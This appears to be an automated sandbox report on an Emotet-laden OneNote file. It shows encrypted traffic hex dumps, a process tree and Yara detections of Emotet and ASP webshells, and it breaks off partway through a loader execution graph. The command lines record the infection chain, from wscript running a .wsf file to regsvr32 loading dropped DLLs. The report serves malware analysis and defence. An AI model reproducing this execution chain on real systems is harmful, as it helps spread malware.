                                                                                                  2023-03-20 12:33:58 UTC416INData Raw: 5c 50 6f 7d fc 22 74 aa 64 5b 3d ca b1 6e 9d db fd 6c 71 79 a1 9c 6b dd 70 52 74 29 54 77 e3 3f 5c 95 2a 11 e6 33 6c 21 a8 36 5d 5a 43 a9 8a f0 75 45 32 e8 41 78 a8 13 5d f7 a4 2c dd 7a 42 cf a3 99 4d 07 f6 12 44 38 93 58 bf 8e 36 76 1c 64 00 6d fa 7c 0a a3 c2 7d bf 8e 89 e7 98 f3 bb 9e 6f 98 ae d0 71 ee 21 01 a8 36 55 34 50 56 75 b0 65 4d 7e b0 6f 74 4d 5d 8a c9 c5 5e 74 91 b4 ad 7d 95 2a 09 b2 e4 6c 21 a2 3e 45 be 92 ee d6 fa 2e d7 b0 db 28 dd 76 66 f4 43 74 90 d9 35 6a b0 29 4a b9 0c 77 67 ad 4c 31 63 a4 24 6b dd 38 69 f7 8c b0 db 2e dd 76 4e f4 43 5c f3 8c 35 6a fc 29 4a 27 b2 62 df 43 23 29 37 fe 04 43 df 31 55 20 25 f2 f3 32 10 a8 13 55 bd 09 03 bc 43 9d 77 6c 1a e4 f1 3f ec 69 b7 06 71 75 01 fa 1e 65 c9 dd 44 71 31 c3 9d df a9 8a f1 01 33 23 84 6a
                                                                                                  Data Ascii: \Po}"td[=nlqykpRt)Tw?\*3l!6]ZCuE2Ax],zBMD8X6vdm|}oq!6U4PVueM~otM]^t}*l!>E.(vfCt5j)JwgL1c$k8i.vNC\5j)J'bC#)7C1U %2UCwl?iqueDq13#j
                                                                                                  2023-03-20 12:33:58 UTC432INData Raw: 3c af 90 c6 f6 2a 0b 53 11 69 a3 88 16 31 7a f0 75 0a 9b f3 98 ea a8 13 12 bd 01 54 10 b4 2f 6c e7 07 18 d1 ce e9 93 de ee 36 12 40 fa 56 75 39 8d 58 ea df 2b 54 a2 13 12 e1 72 2b 54 be 27 10 99 54 f2 a6 f6 12 0b d4 96 ee ea c2 3e 31 4e b9 0f ee 39 30 2a 54 08 97 31 bd b4 ec 11 48 3a 26 6c 52 ae 54 00 64 ed 64 5e a5 c5 b6 8c d7 00 06 04 d6 8e ce ed 11 3c d2 a7 36 44 aa 19 20 5c ef 1c 26 ee 4c 68 c1 b6 51 5d b4 30 2e e8 9f 75 71 81 18 16 1c 21 3a 53 d7 38 51 8d 5d b3 b3 ab 12 0b 59 ee 4c 10 f6 ea 13 2c f2 00 2e 4e a6 fc 0b c7 28 0e 3e 17 54 23 d7 38 49 4e 72 3b 6c eb 02 13 c8 fa 5a 24 ec 29 5e a2 36 12 0d f8 13 6a fa 55 1a 99 3b a4 ab dc 91 30 51 2e 1c 54 3f 26 fc aa d3 2a 5e 5e 49 93 de a2 ab cd 40 b8 6b f8 f0 45 0a 35 7a 2a 54 48 1b 12 21 cd 66 33 be 27
                                                                                                  Data Ascii: <*Si1zuT/l6@Vu9X+Tr+T'T>1N90*T1H:&lRTdd^<6D \&LhQ]0.uq!:S8Q]YL,.N(>T#8INr;lZ$)^6jU;0Q.T?&*^^I@kE5z*TH!f3'
                                                                                                  2023-03-20 12:33:58 UTC448INData Raw: 6c a1 3e 39 77 e6 e9 d1 2e 73 75 16 e6 a9 8a f0 b5 9d 76 31 2a 0b a5 a8 8a 72 cf ae a4 38 6a 77 e7 c7 87 3e 77 67 84 fb 74 73 75 f1 cd 03 75 71 e9 4b 88 ce d5 93 a6 ae 72 36 44 a8 57 3f 6a 3b e1 d7 ef 38 77 67 24 aa e7 f2 f0 b1 74 56 75 20 42 92 8e 75 a3 20 07 7e f4 83 bc 2c 54 3f e9 75 9a ad a8 bc 87 60 6c 21 b1 e4 75 49 18 d3 85 76 00 6d 09 b8 af a4 24 56 75 b7 c1 db 53 3f 6a 39 14 52 6f b8 c2 97 6b 21 29 f5 c1 09 73 91 f0 99 07 6d 71 34 df 54 23 3d f0 de 43 2b 54 28 e3 f2 84 55 6f 39 f6 e2 84 26 29 73 1d 0d 73 56 f4 f4 e8 6a 71 31 f1 7e dc a9 f4 83 ac 2c 54 3f 0f 9a 72 52 e4 bc 9f 60 6c 21 6d f8 f8 b9 74 56 75 fa 95 95 76 31 2a dd 67 72 55 de c3 32 55 3f ef b7 63 d6 b0 38 77 67 d4 20 b5 73 75 a0 18 ae 8a 8e c7 e8 81 36 2a 54 40 0c 75 36 c5 ae a4 38 6a
                                                                                                  Data Ascii: l>9w.suv1*r8jw>wgtsuuqKr6DW?j;8wg$tVu Bu ~,T?u`l!uIvm$VuS?j9Rok!)smq4T#=C+T(Uo9&)ssVjq1~,T?rR`l!mtVuv1*grU2U?c8wg su6*T@u68j
                                                                                                  2023-03-20 12:33:58 UTC464INData Raw: 4c c8 85 a6 9b e6 19 01 68 0e e2 a5 b4 13 cd 96 b9 6d 71 5a 67 ec 28 df 38 8e c5 5e ec 16 b5 7b 6c d9 22 81 fc 32 4c a8 65 57 55 c2 3e e2 9d df 9a 92 8e 79 13 6f 6f db e9 12 c4 2b 54 3f 23 fc 37 42 26 b2 04 7f 2c 2e bc b4 fe 8e 3a dd 0e 59 49 e6 92 6c e9 1c aa 6d b2 73 64 a8 f0 3f 6a f6 29 72 b1 41 88 98 ed 6c 09 f2 10 c7 98 d7 00 51 f6 be 8f 84 ab 11 03 fd 97 c9 bb aa 21 1f a8 e7 1c 0c e4 7c 57 ee 2f 29 91 62 fa 49 73 bf be 8f ff 92 b6 74 9a ac fc 56 75 7a c9 66 84 be 2f c7 af 92 6f 39 f6 12 dc 66 83 71 75 8e 36 e2 6d f0 00 6d b0 5c 9e 5c 48 13 c1 11 cd 6e e0 be 1f c3 1c e3 61 39 b0 22 4c fe 35 73 75 c2 36 0d 0a 38 30 30 30 0d 0a 76 b4 91 07 e4 34 11 92 a5 d3 a6 85 bd 09 0b a3 de ab 9d 68 db 3a 19 f6 12 4c 86 4f 7f 75 c2 36 76 fe 24 b4 e6 3c 81 6e df 65
                                                                                                  Data Ascii: LhmqZg(8^{l"2LeWU>yoo+T?#7B&,.:YIlmsd?j)rAlQ!|W/)bIstVuzf/o9fqu6mm\\Hna9"L5su68000v4h:LOu6v$<ne
                                                                                                  2023-03-20 12:33:58 UTC480INData Raw: 75 bd 01 0b d9 33 aa cf 7f 2a 94 18 b6 86 6e a8 64 53 fe 04 53 a1 94 5a ca bc 98 32 e0 95 ca 50 fc 7b 64 aa 21 1f 12 f1 62 52 e4 7c 57 ec 29 11 a2 36 5d c2 36 4e 9d b3 f7 6d 71 79 a3 51 7c 66 74 36 0c ae 94 30 ee de 6d 52 6f 81 e1 58 6c 21 c0 ca 8b b6 8c 91 30 69 55 0b 71 31 ab 11 3b 8d ea c9 bb aa 11 27 d5 72 6c 52 ae 54 6f 6a ed 54 31 35 77 78 02 d7 00 69 b6 be 4d 40 ed 11 13 3a eb 36 44 40 11 0f 4f fe 29 62 ee 4c 47 88 31 3d 29 b4 30 61 3b 77 75 71 81 28 59 6c 4f ab dc d7 00 1e 64 14 aa c0 ad 32 4c 77 bb 39 77 e6 19 01 7c bc 6c b2 b2 33 55 78 81 20 51 d3 98 7c c9 d7 00 16 6e 43 6c c5 e1 32 4c 16 e4 74 5f ec 39 11 a2 3e 6d 05 f8 53 b2 5e 01 6d f8 75 0e 74 cb e0 df c9 bb 93 82 ad 6a 77 85 73 91 c6 88 a0 29 09 13 dc 75 49 f2 13 5d 4c 25 6d 71 b0 6f 7c c0
                                                                                                  Data Ascii: u3*ndSSZ2P{d!bR|W)6]6NmqyQ|ft60mRoXl!0iUq1;'rlRTojT15wxiM@:6D@O)bLG1=)0a;wuq(YlOd2Lw9w|l3Ux Q|nCl2Lt_9>mS^mutjws)uI]L%mqo|
                                                                                                  2023-03-20 12:33:58 UTC496INData Raw: a0 cb bb d4 93 7b 4e 47 4b b1 6f 39 f6 2b 48 11 6b 49 72 3e f2 12 51 41 33 aa 8e ce eb 30 07 66 7e e7 28 0f 64 be 1e 53 5c 62 7f 32 68 a0 28 05 11 ab 27 49 73 97 11 55 38 63 1a 75 0e 6c 48 df 31 12 7c aa 10 1b 52 02 93 ad 90 b8 03 43 54 68 aa 6a dd 8e 37 72 49 4b 1f 6d 71 f0 4e 70 1f 53 39 bb c9 bb 55 3f 6a ce 64 50 6f 39 f6 13 48 1d 2a 1d 7b 49 b4 12 51 45 10 d4 71 31 eb 30 07 62 79 b7 08 0f 60 c6 d5 ac fc 39 2b 1d 43 7d e5 65 0d 47 f4 3d 57 62 dd 19 5d b9 fa 75 0e 60 aa 12 51 1e cf 6f 70 03 2e fc 28 76 57 b2 23 43 5c a8 6d 57 55 a1 52 ab 8a 8e c7 29 55 05 53 ec 23 56 3d bb 11 ab d5 7b 4e 43 2e 2d 6f 39 3f ec a7 a0 5d 57 41 29 99 0d 0a 31 30 37 65 34 0d 0a 5d 75 b6 44 49 49 3d 14 54 23 97 11 12 7c 29 d5 7b 4e 4f 04 81 6f 39 1c 23 48 19 15 fa 31 6d 4b d7
                                                                                                  Data Ascii: {NGKo9+HkIr>QA30f~(dS\b2h('IsU8culH1|RCThj7rIKmqNpS9U?jdPo9H*{IQEq10by`9+C}eG=Wb]u`Qop.(vW#C\mWUR)US#V={NC.-o9?]WA)107e4]uDII=T#|){NOo9#H1mK
                                                                                                  2023-03-20 12:33:58 UTC512INData Raw: b6 44 49 11 5f 4e 54 23 1e f0 f6 4b ae c0 3f 6a 77 ab d6 4b 99 77 67 6c 6e 8a 73 75 c8 ff 72 d5 71 00 6d 4e 17 c2 ac a2 d2 51 96 44 2b 54 17 63 88 93 93 cb 1d d7 67 6c 21 20 f2 f1 6d d3 56 75 71 15 0a 8e ce ab e0 07 f6 75 36 44 16 7d 5c a5 b0 e8 76 ff 39 77 67 62 d3 29 73 cc 5f 70 c1 fa 30 b8 67 9c cb 62 3f a7 72 e5 36 44 2b 1b b6 ee 53 fc 52 6f 39 f6 e3 48 b1 29 73 75 e1 ed a9 8a f0 b4 49 e1 31 2a 54 19 22 3b 36 cf af 70 af 6a 77 6c d9 eb 1d d7 67 6c 21 c1 b7 f9 49 73 1e fc 74 d5 df 71 31 a3 c8 07 96 75 36 44 6a ed 1f 6a 77 6c 1e e4 fe 44 b5 25 aa e7 fa c1 6d cb 56 75 71 48 e4 dd 15 9a 54 23 56 39 bb 18 0f 24 76 e1 2c 44 1b e4 52 4f 2e e7 c2 68 2d 2a 17 3b a9 95 bd cc 25 fa f5 62 dd 7b 5e 39 bf 0c 0b 03 77 e9 9b 3c d9 f3 1d d7 67 6c 21 61 f8 c9 6d f3 56
                                                                                                  Data Ascii: DI_NT#K?jwKwglnsurqmNQD+Tcgl! mVuqu6D}\v9wgb)s_p0gb?r6D+SRo9H)suI1*T";6pjwlgl!Istq1u6DjjwlD%mVuqHT#V9$v,DRO.h-*;%b{^9w<gl!amV
                                                                                                  2023-03-20 12:33:58 UTC528INData Raw: 71 8b 29 55 01 a3 10 07 66 3d b5 80 03 97 7f 3f 3f e7 be 27 ba 9b 47 ab 64 c1 bd cd 49 73 65 b5 3d 8b ac 39 b8 6f b8 aa 13 81 f1 01 3b b8 18 6a 77 ad 3f 7f 3d cf ee e4 a9 a1 f2 38 59 88 d9 40 49 c1 08 61 38 a1 01 33 a1 97 f7 ae 2e dd 6a 7a f6 19 42 82 76 bc 66 e7 64 39 fa 30 59 b4 13 55 df ff db 3e f6 6f b4 d8 82 b8 04 83 6e 4c 81 ad 5d 37 95 2a 11 8c b3 04 fe ee 36 65 12 1a 56 75 f0 75 7d 2d e7 8a de 9b 9d 1e 1e eb aa 19 2f b5 63 12 e7 e4 74 67 90 8d 0a e3 a2 9c 4a b9 97 9c 75 89 20 61 b0 6f 44 51 06 75 36 c5 5e 44 c5 06 6e 66 d9 2a 29 fe 22 7c aa 64 6b fe 0c 53 65 bd 30 89 65 b6 74 3a 0e ae 56 75 b7 31 3b 81 91 8c 70 07 17 7f 63 fe 22 7c e0 4c 63 76 88 1e 46 70 f0 75 7d 85 4f 92 55 a8 13 65 bf 01 3b df 72 42 fc 29 b2 5c f1 36 ee 24 25 ee 36 65 15 4c 56
                                                                                                  Data Ascii: q)Uf=??'GdIse=9o;jw?=8Y@Ia83.jzBvfd90YU>onL]7*6eVuu}-/ctgJu aoDQu6^Dnf*)"|dkSe0et:Vu1;pc"|LcvFpu}OUe;rB)\6$%6eLV
                                                                                                  2023-03-20 12:33:58 UTC544INData Raw: 77 81 18 1e 89 95 d6 09 dd 30 59 cd 6e 6f f8 2f 18 4f 50 6f 39 cf a6 ac e1 e9 f8 38 26 84 b7 b4 9b 06 e4 24 5e 41 11 4c 08 fc 73 2b ea 39 50 68 b6 01 3d 65 b8 02 08 91 44 72 8b fe 0c 1c df 30 8e c7 28 1e c0 27 54 23 dd 30 59 85 cb 51 b6 2f 18 ad 37 00 32 f6 12 03 12 4f e8 0a c2 36 39 fc 34 13 aa 34 5e dc a1 23 56 f4 73 2b bc 1f 3f 6a f6 21 3d 99 a9 68 b7 ed 54 46 91 4a 44 77 dd 30 1e 89 28 5e f6 6f 3b e0 8f 75 36 2f 6e 3b 61 e3 32 03 93 0a 56 71 0c 29 4e 6b fa 30 26 f2 23 1a 39 6d 39 56 ba 6f 3b 62 df 77 f1 01 44 e1 39 6a 77 07 17 00 1c fe 22 03 e0 4c 1c 7e 88 1e 39 76 f0 75 02 63 18 d2 54 e4 13 9a a4 27 2b 54 be 27 98 af 0c eb d8 b6 0a 83 22 a8 06 9a 96 ac ae 46 b6 45 8a 6c ee 2a 54 48 13 92 75 cd 6e b3 54 2f 90 4b db 2a de cf 86 6e 36 91 f2 30 ae 77 c7
                                                                                                  Data Ascii: w0Yno/OPo98&$^ALs+9Ph=eDr0('T#0YQ/72O6944^#Vs+?j!=hTFJDw0(^o;u6/n;a2Vq)Nk0&#9m9Vo;bwD9jw"L~9vucT'+T'"FEl*THunT/K*n60w
                                                                                                  2023-03-20 12:33:58 UTC560INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 04 00 08 01 00 00 30 a4 38 a4 48 a4 50 a4 68 a4 70 a4 78 a4 90 a4 98 a4 a0 a4 c0 a4 c8 a4 d8 a4 e0 a4 48 a6 50 a6 58 a6 60 a6 80 a6 88 a6 90 a6 a8 a6 b0 a6 b8 a6 00 a8 08 a8 10
                                                                                                  Data Ascii: 08HPhpxHPX`


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:13:33:07
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\malware.one
                                                                                                  Imagebase:0x3d0000
                                                                                                  File size:1676072 bytes
                                                                                                  MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:13:33:32
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                  Imagebase:0x3d0000
                                                                                                  File size:147456 bytes
                                                                                                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.386000568.0000000005771000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 0000000A.00000003.385846809.0000000005765000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:13:33:44
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/tsr
                                                                                                  Imagebase:0x12c0000
                                                                                                  File size:157872 bytes
                                                                                                  MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:13:33:56
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                                                                                                  Imagebase:0x12c0000
                                                                                                  File size:157872 bytes
                                                                                                  MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:13:34:00
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll
                                                                                                  Imagebase:0x2a0000
                                                                                                  File size:20992 bytes
                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:13:34:00
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline: "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll"
                                                                                                  Imagebase:0x7ff7bfa30000
                                                                                                  File size:24064 bytes
                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.373814331.0000000000E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:13:34:03
                                                                                                  Start date:20/03/2023
                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JMgyzwrCUAZpIA\OfEg.dll"
                                                                                                  Imagebase:0x7ff7bfa30000
                                                                                                  File size:24064 bytes
                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.573776336.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.573888713.0000000002061000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.9%
                                                                                                    Dynamic/Decrypted Code Coverage:21.8%
                                                                                                    Signature Coverage:16.8%
                                                                                                    Total number of Nodes:101
                                                                                                    Total number of Limit Nodes:12
                                                                                                    execution_graph 32732 c00000 32736 c0015a 32732->32736 32733 c008eb 32734 c0033f GetNativeSystemInfo 32734->32733 32735 c00377 VirtualAlloc 32734->32735 32737 c00395 VirtualAlloc 32735->32737 32741 c003aa 32735->32741 32736->32733 32736->32734 32737->32741 32738 c008c6 RtlAddFunctionTable 32738->32733 32739 c00873 32739->32733 32739->32738 32740 c0084b VirtualProtect 32740->32741 32741->32739 32741->32740 32742 2608590 32743 26085d8 32742->32743 32746 2603a34 32743->32746 32745 26087d8 32748 2603acc 32746->32748 32747 2603b73 CreateProcessW 32747->32745 32748->32747 32749 2616938 32752 26098c8 32749->32752 32751 2616a00 32753 26098f9 32752->32753 32754 2609960 32753->32754 32755 2609b56 Process32FirstW 32753->32755 32754->32751 32755->32753 32756 1800012ac 32763 180003648 32756->32763 32759 1800012b9 32772 180003a9c 32763->32772 32766 1800117a0 32785 18002c4d0 GetLastError 32766->32785 32769 18000365c 32818 180003a30 32769->32818 32771 180003667 32771->32759 32773 1800012b5 32772->32773 32774 180003abb GetLastError 32772->32774 32773->32759 32773->32766 32784 180007790 6 API calls try_get_function 32774->32784 32786 18002c4f4 32785->32786 32787 18002c4f9 32785->32787 32811 18002d43c 6 API calls __vcrt_uninitialize_ptd 32786->32811 32791 18002c542 32787->32791 32804 18002e7ac 32787->32804 32793 18002c551 SetLastError 32791->32793 32794 18002c547 SetLastError 32791->32794 32792 18002c518 32812 18002e8a0 15 API calls 2 library calls 32792->32812 32796 1800012c2 32793->32796 32794->32796 32796->32759 32796->32769 32798 18002c52f 32798->32792 32800 18002c536 32798->32800 32799 18002c51f 32799->32794 32814 18002bf58 15 API calls __lc_wcstolc 32800->32814 32802 18002c53b 32815 18002e8a0 15 API calls 2 library calls 32802->32815 32805 18002e7bd __lc_wcstolc 32804->32805 32806 18002e80e 32805->32806 32807 18002e7f2 RtlAllocateHeap 32805->32807 32816 180031a08 EnterCriticalSection LeaveCriticalSection __lc_wcstolc 32805->32816 32817 18002e69c 15 API calls abort 32806->32817 32807->32805 32808 18002c510 32807->32808 32808->32792 32813 18002d494 6 API calls __vcrt_uninitialize_ptd 32808->32813 32811->32787 32812->32799 32813->32798 32814->32802 32815->32791 32816->32805 32817->32808 32819 180003a44 32818->32819 32820 180003a5e 32818->32820 32821 180003a4e 32819->32821 32824 180007790 6 API calls try_get_function 32819->32824 32820->32771 32825 1800077d8 6 API calls try_get_function 32821->32825 32825->32820 32826 180048a60 32827 180048ab5 6 API calls 32826->32827 32829 180048c55 ShowWindow UpdateWindow GetMessageW 32827->32829 32830 180048cc6 32827->32830 32829->32830 32831 180048c83 TranslateAcceleratorW 32829->32831 32832 180048caf GetMessageW 32831->32832 32833 180048c99 TranslateMessage DispatchMessageW 32831->32833 32832->32830 32832->32831 32833->32832 32834 180001260 32835 180001269 __scrt_initialize_onexit_tables 32834->32835 32837 18000126d 32835->32837 32838 1800101cc 32835->32838 32839 1800101ea 32838->32839 32840 180010200 32838->32840 32871 18002e69c 15 API calls abort 32839->32871 32861 18002ffd0 32840->32861 32844 1800101ef 32872 18002e4f0 33 API calls _invalid_parameter_noinfo 32844->32872 32845 180010232 32865 180010168 32845->32865 32849 18001027a 32873 18002e69c 15 API calls abort 32849->32873 32851 18001028b 32853 1800102d7 32851->32853 32854 1800102f0 32851->32854 32859 18001027f 32851->32859 32874 18002e8a0 15 API calls 2 library calls 32853->32874 32876 18002e8a0 15 API calls 2 library calls 32854->32876 32856 1800102e0 32875 18002e8a0 15 API calls 2 library calls 32856->32875 32877 18002e8a0 15 API calls 2 library calls 32859->32877 32860 1800101fb 32860->32837 32862 180010205 GetModuleFileNameA 32861->32862 32863 18002ffdd 32861->32863 32862->32845 32878 18002fe18 56 API calls 5 library calls 32863->32878 32866 180010187 32865->32866 32870 180010183 32865->32870 32867 18002e7ac __lc_wcstolc 15 API calls 32866->32867 32866->32870 32868 1800101b6 32867->32868 32879 18002e8a0 15 API calls 2 library calls 32868->32879 32870->32849 32870->32851 32871->32844 32872->32860 32873->32859 32874->32856 32875->32860 32876->32859 32877->32860 32878->32862 32879->32870

                                                                                                    Executed Functions

                                                                                                    Function 00C00000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 c00000-c0029a call c0091c * 2 13 c002a0-c002a4 0->13 14 c00905 0->14 13->14 16 c002aa-c002ae 13->16 15 c00907-c0091a 14->15 16->14 17 c002b4-c002b8 16->17 17->14 18 c002be-c002c5 17->18 18->14 19 c002cb-c002dc 18->19 19->14 20 c002e2-c002eb 19->20 20->14 21 c002f1-c002fc 20->21 21->14 22 c00302-c00312 21->22 23 c00314-c0031a 22->23 24 c0033f-c00371 GetNativeSystemInfo 22->24 26 c0031c-c00324 23->26 24->14 25 c00377-c00393 VirtualAlloc 24->25 29 c00395-c003a8 VirtualAlloc 25->29 30 c003aa-c003ae 25->30 27 c00326-c0032a 26->27 28 c0032c-c0032d 26->28 31 c0032f-c0033d 27->31 28->31 29->30 32 c003b0-c003c2 30->32 33 c003dc-c003e3 30->33 31->24 31->26 34 c003d4-c003d8 32->34 35 c003e5-c003f9 33->35 36 c003fb-c00417 33->36 37 c003c4-c003d1 34->37 38 c003da 34->38 35->35 35->36 39 c00458-c00465 36->39 40 c00419-c0041a 36->40 37->34 38->36 41 c00537-c00542 39->41 42 c0046b-c00472 39->42 43 c0041c-c00422 40->43 46 c006e6-c006ed 41->46 47 c00548-c00559 41->47 42->41 48 c00478-c00485 42->48 44 c00424-c00446 43->44 45 c00448-c00456 43->45 44->44 44->45 45->39 45->43 51 c006f3-c00707 46->51 52 c007ac-c007c3 46->52 49 c00562-c00565 47->49 48->41 50 c0048b-c0048f 48->50 53 c00567-c00574 49->53 54 c0055b-c0055f 49->54 55 c0051b-c00525 50->55 56 c007a9-c007aa 51->56 57 c0070d 51->57 58 c007c9-c007cd 52->58 59 c0087a-c0088d 52->59 62 c0057a-c0057d 53->62 63 c0060d-c00619 53->63 54->49 60 c00494-c004a8 55->60 61 c0052b-c00531 55->61 56->52 64 c00712-c00736 57->64 65 c007d0-c007d3 58->65 80 c008b3-c008ba 59->80 81 c0088f-c0089a 59->81 66 c004aa-c004cd 60->66 67 c004cf-c004d3 60->67 61->41 61->50 62->63 68 c00583-c0059b 62->68 72 c006e2-c006e3 63->72 73 c0061f 63->73 93 c00796-c0079f 64->93 94 c00738-c0073e 64->94 70 c007d9-c007e9 65->70 71 c0085f-c0086d 65->71 75 c00518-c00519 66->75 76 c004e3-c004e7 67->76 77 c004d5-c004e1 67->77 68->63 78 c0059d-c0059e 68->78 82 c007eb-c007ed 70->82 83 c0080d-c0080f 70->83 71->65 74 c00873-c00874 71->74 72->46 84 c00625-c00648 73->84 74->59 75->55 91 c004e9-c004fc 76->91 92 c004fe-c00502 76->92 89 c00511-c00515 77->89 90 c005a0-c00605 78->90 85 c008eb-c00903 80->85 86 c008bc-c008c4 80->86 95 c008ab-c008b1 81->95 96 c007fb-c0080b 82->96 97 c007ef-c007f9 82->97 87 c00811-c00820 83->87 88 c00822-c0082b 83->88 107 c006b2-c006b7 84->107 108 c0064a-c0064b 84->108 85->15 86->85 99 c008c6-c008e9 RtlAddFunctionTable 86->99 102 c0082e-c0083d 87->102 88->102 89->75 90->90 103 c00607 90->103 91->89 92->75 101 c00504-c0050e 92->101 93->64 100 c007a5-c007a6 93->100 104 c00740-c00746 94->104 105 c00748-c00754 94->105 95->80 106 c0089c-c008a8 95->106 96->102 97->102 99->85 100->56 101->89 109 c0084b-c0085c VirtualProtect 102->109 110 c0083f-c00845 102->110 103->63 112 c0077b-c0078d 104->112 113 c00764-c00776 105->113 114 c00756-c00757 105->114 106->95 116 